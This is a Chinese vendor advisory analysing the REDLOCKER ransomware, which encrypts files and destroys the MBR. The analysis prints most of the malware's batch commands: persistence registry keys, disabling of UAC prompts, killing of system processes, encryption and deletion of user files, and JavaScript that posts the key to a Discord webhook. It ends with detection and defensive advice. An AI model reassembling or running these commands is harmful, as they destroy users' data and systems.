打开微信“扫一扫”,开启安全数字世界之旅
截图或长按保存至相册,使用微信扫一扫
首页 > 安全通告

安全通告

【安全通告】破坏MBR!新型勒索病毒REDLOCKER来袭
发布时间 :2021年03月29日
分享:

近日,亚信安全网络实验室截获了一款破坏MBR的新型勒索病毒REDLOCKER,该病毒通过网络下载感染本机,到达系统后释放两个组件,其中一个组件是脚本文件,其采用RC4加密算法加密文件,并释放MBR破坏程序,导致用户系统重启后显示黑客留下的信息,无法进入系统。另外一个文件为工具集,提供了RC4加密,AES加密等功能,由脚本文件进行调用。亚信安全将该勒索命名为Ransom.Win32.REDLOCKER.YCBCQ。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KjuROts78a6IZ124iaXpg4SicSibn2cYricFFY8Gw30kORUWua72siar24Pg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1


攻击流程



https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KeZvAfibH1J3F89BQwROkDJzLUbIRarSxHuoFjPZsm3m6l6qAmPl5chQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1


病毒详细分析



母体文件分析


样本启动后从自身资源节中导出数据,在%temp%目录创建2个病毒组件:

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K4e1icicNyKVCCC3lteRBjicIAYaDzjlicsg9ricSEFgFLPPlMs1nMsftqmA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KcsiaMymbSsVjxa1hVFMBnSZBm2ibCvicycM84LZMibY4bgiccAaxkKibAFIA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KxsgmuVb1Mrd8sLbrpAx6rzwLK9XjeLMeBPAlHD4YqVUjYbgGsLzOIw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KBedfUjtZDr9Ak4sk7oalHiaHPwxQ9L3EabmMicAD4TzicsCcNaaZIqibLg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

执行生成的批处理文件1c04.bat(该文件名为随机命名,本文以1c04.bat为例,进行分析):

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KvQD05Ao3UIiclXmzxxx2kmS8LnG4VXEUAvxEd3m7PlK6mTltIuIj2iag/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

1c04.bat文件分析


  • 将病毒母体文件变为“只读”属性。

    Attrib +R %0

  • 将病毒母体添加到开机自启动。

    Copy /b /y %0 “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup”

  • 结束“文件资源管理器”和“系统服务”。

    Taskkill /im explorer.exe /f

    Taskkill /im svchost.exe /f

  • 设置注册表自启动项目。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Payload" /t REG_SZ /d "powershell.exe start -verb runas '"%0"' am_admin -WindowStyle hidden" /f>nul

  • 建立EXE文件关联,每次双击EXE文件时都会运行此病毒母体文件。

    REG ADD "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d "%0 %%1 %%*" /f

  • 阻止用户使用“我的电脑”来访问所选驱动器的内容。

  • 从“我的电脑”和Windows资源管理器中删除代表所选驱动器的图标。此外,代表所选驱动器的驱动器号也不会出现在标准“打开”对话框中。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewonDrive" /t REG_DWORD /d 12 /f>nul

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 12 /f>nul


上述行为对应的亚信安全沙盒检测如下:


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K8icXicctVdos8I2CnfRS3icLBAcQMRQSt5qViaCP0uibialSe5KBZJxXbV3A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KEOTGcyicykufptZaMDPboN882Q6IRF4yNSLuln8LE2VFeslSS5y8bUw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 生成并打开“勒索信”。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KpHNdSAJX00qy2tdV9GicJ2KdibsUYVqdSa9VXoN06ILLJtAJbHJwNDgA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 解密文件finalwords.exe 并设置开机启动。

    certutil -decode finalwords.tmp finalwords.exe

    schtasks /create /SC ONEVENT /RU "SYSTEM" /EC System /TN InstantKill /TR "powershell.exe start -verb runas %cd%\finalwords.exe" /RL HIGHEST /MO *[System\EventID=6005] /F>Nul





https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K196evamOQy09HPsPmnqAFMSaUxKlsnxx2t0ozNR6xX0Wa4QnRQj7kA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

【亚信安全沙盒检测截图】
  • 禁用安全桌面提示;

  • 允许执行需要提升到管理员的操作,而无需征得同意或凭据;

  • 当程序尝试对计算机进行更改时,Windows 会通知用户。

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f

    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f

  • 设置键盘映射代码屏蔽按键 (左右ALT键等)。
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64 > nul

  • 调用程序:extd.exe生成5个随机字符进行合并存入变量randomletter。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KzMh8ica1a5CuX9g5eDBvWCuezVYyBJ8TjPE7g71zeErg14Uu7gg1JOQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

  • 将%temp%文件夹及其子文件夹中的文件加上“只读”、“系统文件”和“隐藏”属性。

    attrib +r +s +h /S /D %temp%

  • 切换到用户文件夹目录,然后枚举出此目录及其子目录指定后缀的文件列表,并保存到文件pathhost中。


    cd /D %HOMEDRIVE%\Users\

    dir /s /b | findstr /I /R "db exe bat doc docx xls ppx txt css html jpg eps ppt png pdf rar avi zip raw jpeg mp3 wav wma tar epub azw ibook img ani bfc blg cat cer cfg ini part prt 1 2 3 cur cpl crl crt dat db der dll dsn ds dun fnd fng fon font hlp grp isp ins inf key lnk ink msc msi msp msstyles nfo ocx otf p7c pif pm pnf psw qds rdp reg scr sct shs sys theme tmp ttc ttf wav wmdb wme wsc wsf wsh aif aifc aiff adf amf mid mi di miz mp1 mp2 mp3 mtm ogg ogm ra rmi snd stm stz vox wax wm wma wmv ace arj bz bz2 cab gz ha lha lzh r0 tbz tbz2 tgz uu uue zoo xxe bmp bw cdt cpt cgm dcx dib emf gbr gif gih ico iff ilbm jfif jif jpe lbm mac pict pct pic pcx pix pntg psd psp qtif qti rgb rgba tga tif tiff wmf dic diz dochtml hta exc log idx pdf rtf s cp wri wtx pps ppa pothtml ppthtml dot dothtml csv dqy xl asx wvx wm ctt ymg yps asp htm htt js jse jsp mht mhtml php shtm url xml xsl eml mbx msg bin class c h cpp java jar m3u vbs spl swf c++ csharp c# ppsx ps1 shb docm odt svg webp heic">pathhost


  • 将枚举出的文件添加“只读”、“系统文件”和“隐藏”属性。
    attrib +r +s +h pathhost

  • 读取文件列表中的每一个文件,并使用Base64加密,然后使用生成的随机字符作为密钥,对Base64加密后的文件使用RC4算法加密。删除加密中间文件。
    for /f %%a in (pathhost) do (

    certutil -f -encode %%a %%a

    %extd% /aesencode %%a %%a.a %randomletter%

    %extd% /rc4 %%a %%a.aa %randomletter%

    del /f /s /q %%a

    del /f /s /q %%a.a)

  • 对所有aa后缀结尾的文件添加“只读”属性。
    attrib +r *.aa /S

  • 将密钥发送到黑客服务器。
    set str=var request = new XMLHttpRequest();

    set str2=request.open("POST", "hxxps[:]//discord[.]com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UV yVIbp-4tehVd6_cnFln19Z4Ro5R76Ci");

    set str3=request.setRequestHeader('Content-type', 'application/json');

    set str4=var params = {

    set str5=username: "",

    set str6=avatar_url: "",

    set str7=content: "%randomletter%"}

    set str8=request.send(JSON.stringify(params));

    echo %str%>ThreadSender.js

    echo %str2%>>ThreadSender.js

    echo %str3%>>ThreadSender.js

    echo %str4%>>ThreadSender.js

    echo %str5%>>ThreadSender.js

    echo %str6%>>ThreadSender.js

    echo %str7%>>ThreadSender.js

    echo %str8%>>ThreadSender.js

    start ThreadSender.js



finalwords.exe文件分析

该文件运行后尝试链接如下地址下载数据:
User-Agent:UFTUEDQSQYYNQUPDZWPRJLCCXDDNLLWZ
URL: hxxp://doggofallingwater[.]000webhostapp[.]com/logger.php


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KSbmtdqjDLKXyQ8OcQa39PdM0A49BbAA3Z03UBkbRiaXRhKqVpn4FHsg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

然后主动触发异常,迫使系统重启。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K3aeAVC32xIS0KtOIJRrIrWt2ksibx8icbiaTG2TiaPkBwFjOIT6rG0kUNQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

由于MBR被覆盖,系统重启后显示黑客写入的信息,系统无法正常启动。


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K9CMpDQGlveXSNBu1OydmFh6icNEcoQ8Qwg5TlackotjiaO7RkNMhuMcw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

Extd.exe文件分析


该文件是一个工具集,提供许多实用功能,如:AES加密、AES解密、RC4加密、判断系统版本、判断系统语言、文件下载等。所有功能列表如下:


https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49K7Xk16eTx0wr441QPjGcuSKg170icVxKmzLvgybmg2ZHbyFaD9xicqwlw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

亚信安全产品解决方案


  • 亚信安全病毒码版本16.609.60,云病毒码版本16.609.71,全球码版本16.609.00 已经可以检测,请用户及时升级病毒码版本;

  • 亚信安全DDAn沙盒平台已经可以检测。

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49KOHrI3RtalaYiaUJpto0cTU9fm5owIfZa7KvcmL5dF5lCqshjHia8mHWA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

安全建议


  • 打开系统自动更新,并检测更新进行安装;

  • 不要点击来源不明的邮件以及附件;

  • 不要点击来源不明的邮件中包含的链接;

  • 请到正规网站或者应用商店下载程序;

  • 采用高强度的密码,避免使用弱口令密码,并定期更换密码;

  • 尽量关闭不必要的端口;

  • 尽量关闭不必要的网络共享;

  • 请注意备份重要文档。备份的最佳做法是采取3-2-1规则,即至少做三个副本,用两种不同格式保存,并将副本放在异地存储。


IOCs:

https://mmbiz.qpic.cn/mmbiz_png/iczzp36h0nbHBeV51QB1vXYjjU1LiaT49Knrlkp2v9NcFiat0We7vib3DXuu9xg9j9y7MUQFZso6ENe9GcBwLZaVHQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1

分享到微信
X